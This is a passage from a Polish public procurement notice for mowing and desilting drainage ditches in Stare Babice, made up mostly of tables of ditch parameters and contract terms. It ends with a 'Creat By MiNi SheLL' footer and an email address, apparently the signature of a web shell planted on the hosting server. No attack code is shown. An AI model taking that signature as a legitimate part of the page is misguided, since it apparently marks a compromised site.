rów pierwszej kolejności koszenia	106	596		-	1
Z - 7	5 810	32 873	0,5	9	27
Z - 7/1	1 050	6 063	0,5	4	9
Z - 7/1/1	695	3 522	0,5	4	5
Z - 7/1/2	350	1 730	0,5	1	3
Z - 7/1/3	420	1 914	0.5	-	2
Z - 7/2	44	171	0.5	1	-
Z - 7/3	70	277	0.5	1	-
Z - 7/4	40	245		1	-
Z - 7/5	130	673	0.5	1	-
Z - 7/6	1 320	7 234	0.5	10	11
Z - 7/8
rów pierwszej kolejności koszenia	3 270	15 024	0.5	13	16
Z - 8	2 660	15 973	0.5	21	17
Z - 8/1	540	3 060	0.5	2	8
Z - 8/2	440	3 106	0.5	-	2
Z - 8/3	220	1 606	0.5	-	4
Z - 8/4	872	4 900	0.5	6	3
Z - 8/5	475	2 527	0.5	-	-
Z - 9	1 380	7 668	0.5	-	7
Z - 9/1	1 230	4 772	0.5	-	4
Z - 9/2	300	1 230	0.5	-	-
Z - 9/3	490	1 901	0.5	-	1
Z - 9/4	180	698	0.5	-	-
Z -10	560	2 357	0.5	-	1
Z - 11	1 160	4 454	0.5	-	10
Z - 12	370	1 569	0.5	-	-
Z - 13	600	2 760	0.5	-	7
Z - 13/1	210	890	0.5	-	2
Z - 14	1 320	5 122	0.5	-	6
Z - 14/2	300	1 164	0.5	-	-
Z - 14/3	250	970	0.5	-	-
Z - 15	1 580	10 030	0.5	-	-
Z - 16	800	2 777	0.5	-	5
Z - 16/1	260	915	0.5	-	2
O - 11/1	3 650	26 914	0.5	32	3
O - 11/1/2	920	4 989	0.5	8	11
O - 11/1/3	960	5 869	0.5	4	10
O - 11/1/4	157	900	0.5	3	3
O - 11/1/5	1 400	8 813	0.5	10	4
O - 11/1/6	1 900	13 206	0.5	21	35
O - 11/1/7	1 224	7 699	0.5	14	18
O - 11/1/8	34	122	0.5	2	-
O - 11/1/9	160	1 082	0.5	-	-
O - 11/1/10	1 100	8 694	0.5	11	21
O - 11/1/11	480	3 123	0.5	8	2
O - 11/1/12	270	1925	0.5	3	1
O - 11/1/13	540	4 487	0.5	4	2
O - 11/1/14	90	477	0.5	-	-
O - 11/2	1 325	7 967	0.5	4	8
O - 16/3	3 348	24 379	0.5	14	5
O - 16/3/6	535	3 585	0.5	9	1
O - 16/3/7	436	3 139	0.5	5	9
O - 16/3/8	3 175	22 640	0.5	8	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.72.00.00-0, 50.80.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odmulanie dna rowów melioracyjnych na terenie gminy Stare Babice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest mechaniczne lub ręczne odmulenie dna rowów melioracyjnych na terenie gminy Stare Babice.
1)	Szczegółowy zakres prac:
a)	odmulenie dna rowów melioracyjnych o dł. ok. 13 027 mb na całej szerokości dna warstwą min. 40 cm z jego rozplantowaniem na koronie rowu melioracyjnego,
b)	odmulenie 3 rurociągów O 80 cm o długości 104 mb, 104 mb, 100 mb (ok. 1/2 zamulenia) wraz z wywiezieniem namułu,
c)	oczyszczenie z namułu 58 szt. wylotów drenarskich,
d)	oczyszczenie  z namułu  145 szt. przepustów (ok. 1/2 zamulenia).
e)	zebranie śmieci z odmulonych rowów (z dna, skarp i korony) i ich wywóz we własnych workach i we własnym zakresie,
f)	Wykonawca realizował będzie prace związane z odmulaniem dna rowów melioracyjnych dopiero po wykonaniu koszenia skarp rowów przeznaczonych do odmulenia; 
Wykonawca Części 1 zamówienia ma obowiązek wykoszenia rowów przeznaczonych do odmulenia w pierwszej kolejności,





2)	Parametry rowów melioracyjnych
Rów
melioracyjny	Długość
(mb)	Pow. skarp
(m2)	Szerokość
dna (m)	Wyloty
drenarskie
(szt.)	Przepusty
(szt.)
Z -  5	8 463 + 308 (rurociągi)	46 001	0,5	38	126
Z - 5/27	880	4 296	0,5	7	11
Z - 5/28	106	596	0,5	-	1
Z - 7/8	3270	15 024	0,5	13	16.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.72.00.00-0, 50.80.00.00-3, 90.51.36.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com